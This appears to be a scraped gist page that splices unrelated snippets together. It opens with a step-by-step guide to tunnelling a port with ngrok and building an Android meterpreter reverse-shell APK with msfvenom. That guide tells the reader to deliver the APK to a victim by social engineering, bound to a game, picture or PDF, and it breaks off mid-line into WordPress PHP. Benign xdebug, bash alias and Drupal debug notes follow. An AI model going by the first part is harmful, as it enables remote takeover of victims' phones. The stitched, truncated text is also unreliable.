Step1: download and configure the ngrok and move it to usr/bin/ in kali linux
Setp2: ngrok tcp 4444 [o/p: Forwarding tcp://2.tcp.ngrok.io:14621 -> localhost:4444 ]
Step3: create payload using msfvenom e.g.
-> msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=14621 R> /var/www/html/payload.apk or if port forwarded
-> msfvenom -p android/meterpreter/reverse_tcp LHOST=router_external_ip(mine:45.121.xxx.xxx) LPORT=forwarded_port_of_router(mine:3000) R> /var/www/html/payload.apk
Note: after generation of the payload you need to send it to the victim via any social engineering delivery method (e.g. binding with game, picture, pdf or via direct link)
Step4: open metasploit console by runing msfconsoleadd_action( 'login_enqueue_scripts', array($this, 'theme_login_logo' ));
public function theme_login_logo()
{ ?>
<style type="text/css">
#login h1 a, .login h1 a {
background-image: url(<?php echo get_stylesheet_directory_uri(); ?>/assets/img/logo/site-login-logo.png);
height:65px;
width:320px;functions.php
add_action( 'woocommerce_before_single_variation',
'action_wc_before_single_variation' );
function action_wc_before_single_variation() {
?>
<script type="text/javascript">
(function($){
$('form.variations_form').on('show_variation', function(event, data){
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Install xdebug for linux: | |
| sudo apt-get install php-xdebug | |
| sudo phpenmod xdebug | |
| sudo gedit /etc/php/7.2/mods-available/xdebug.ini | |
| then paste the below code: | |
| zend_extension="xdebug.so" | |
| xdebug.remote_enable = 1 | |
| xdebug.remote_port = 9000 | |
| xdebug.idekey = PHPSTORM | |
| xdebug.show_error_trace = 1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Open the Terminal app | |
| 1.Edit ~/.bash_aliases or ~/.bashrc file using: sudo nano ~/.bash_aliases | |
| 2.Append your bash alias | |
| For example append: alias update='sudo yum update' | |
| 3.Save and close the file. | |
| 4.Activate alias by typing: source ~/.bash_aliases | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 👉️Initial steps to follow.. | |
| 📌️1.Copy example.settings.local.php from /sites to /sites/default and rename to settings.local.php | |
| 📌️2.Enable render cache by uncomment this $settings['cache']['bins']['render'] = 'cache.backend.null'; in settings.local.php | |
| 📌️3.Go to sites/default/settings.php' and uncomment the commented lines that mention 'settings.local.php'. | |
| 📌️4.Go to /sites/development.services.yml file and paste below code at the top. | |
| 👉️development.services.yml | |
| parameters: | |
| http.response.debug_cacheability_headers: true | |
| twig.config: | |
| debug: true |